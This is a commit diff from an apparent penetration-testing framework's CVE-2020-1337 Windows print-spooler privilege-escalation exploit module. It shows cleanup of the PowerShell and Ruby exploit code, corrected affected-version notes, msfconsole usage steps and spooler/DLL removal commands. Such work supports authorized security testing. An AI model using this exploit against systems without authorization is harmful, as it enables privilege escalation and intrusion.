Cleanup and edits per review from Christophe

Removed unused method from ps script Cleaned up some code in the module Added removal instructions to the documentation
2024-07-18 18:31:41 +02:00 · 2021-01-11 16:02:58 -06:00 · 2021-01-11 16:02:58 -06:00 · 50e115b414
commit 50e115b414
parent 7d81b4826d
3 changed files with 12 additions and 43 deletions
--- a/data/exploits/CVE-2020-1337/cve-2020-1337.ps1
+++ b/data/exploits/CVE-2020-1337/cve-2020-1337.ps1
@ -74,31 +74,6 @@ $MethodDefinition = @"
                }
                return bSuccess;
            }
-            public static bool SendFileToPrinter(string szPrinterName, string szFileName)
-            {
-                // Open the file.
-                FileStream fs = new FileStream(szFileName, FileMode.Open);
-                // Create a BinaryReader on the file.
-                BinaryReader br = new BinaryReader(fs);
-                // Dim an array of bytes big enough to hold the file's contents.
-                Byte[] bytes = new Byte[fs.Length];
-                bool bSuccess = false;
-                // Your unmanaged pointer.
-                IntPtr pUnmanagedBytes = new IntPtr(0);
-                int nLength;
-                nLength = Convert.ToInt32(fs.Length);
-                // Read the contents of the file into the array.
-                bytes = br.ReadBytes(nLength);
-                // Allocate some unmanaged memory for those bytes.
-                pUnmanagedBytes = Marshal.AllocCoTaskMem(nLength);
-                // Copy the managed byte array into the unmanaged array.
-                Marshal.Copy(bytes, 0, pUnmanagedBytes, nLength);
-                // Send the unmanaged bytes to the printer.
-                bSuccess = SendBytesToPrinter(szPrinterName, pUnmanagedBytes, nLength);
-                // Free the unmanaged memory that you allocated earlier.
-                Marshal.FreeCoTaskMem(pUnmanagedBytes);
-                return bSuccess;
-            }
        }
    }
 "@;
--- a/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md
+++ b/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md
@ -20,24 +20,31 @@ but the link will be in place when the print takes place, so the file
 write will pass through and end up in the trusted location.

 When the printer is created, the target will show a pop-up saying a
-printer weas created.
+printer was created.
 A larger issue here is that the Spooler service does not like to stop.
 Trying `sc stop` Spooler does not stop the spooler.
 Killing the pid with a trusted process will kill it, but it restarts
 automatically.
 Using the `pendingFileRenameOperations` registry key also does not appear
 to work.
+To remove the dll, you can:
+`sc config spooler start= disabled`
+`taskkill /F /IM spoolsv.exe`
+`del ualapi.dll`
+`sc config spooler start= auto`
+`sc start spooler`

 ## Verification Steps

 Start ```msfconsole```
- get session on a windows target that is not patched (and <= 2003)
+ get session on a windows target that is not patched (and <= windows 10 version 2004)
 ```use windows/local/cve_2020_1337_printerdemon```
 ```set session <session>```
 ```set payload <payload>```
 ```set lhost <lhost>```
 ```set lport <lport>```
 ```run```
+
 Reboot twice
 Verify you get a session

--- a/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
+++ b/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
@ -15,6 +15,8 @@ class MetasploitModule < Msf::Exploit::Local
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Powershell

+  prepend Msf::Exploit::Remote::AutoCheck
+
  def initialize(info = {})
    super(
      update_info(
@ -92,7 +94,6 @@ class MetasploitModule < Msf::Exploit::Local

    # Run Exploit Script
    print_status("Running Exploit on #{sysinfo['Computer']}")
-    vprint_status(script)
    begin
      #client.powershell.execute_string(code: script)
      session.powershell.execute_string({code: script})
@ -138,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Local
      vprint_status("Rebooting #{sysinfo['Computer']}")
      reboot_command = 'shutdown /r'
      begin
-        cmd_exec('cmd.exe', "/c #{reboot_command}")
+        session.sys.power.reboot
      rescue Rex::TimeoutError => e
        elog('Caught timeout.  Exploit may be taking longer or it may have failed.', error: e)
        print_error('Caught timeout.  Exploit may be taking longer or it may have failed.')
@ -168,20 +169,6 @@ class MetasploitModule < Msf::Exploit::Local
    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
    vprint_status("Build Number = #{build_num}")
    return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363
-
    return Exploit::CheckCode::Safe
  end
-
-  def ensure_clean_destination(path)
-    return unless file?(path)
-
-    print_status("#{path} already exists on the target. Deleting...")
-    begin
-      file_rm(path)
-      print_status("Deleted #{path}")
-    rescue Rex::Post::Meterpreter::RequestError => e
-      elog(e)
-      print_error("Unable to delete #{path}")
-    end
-  end
 end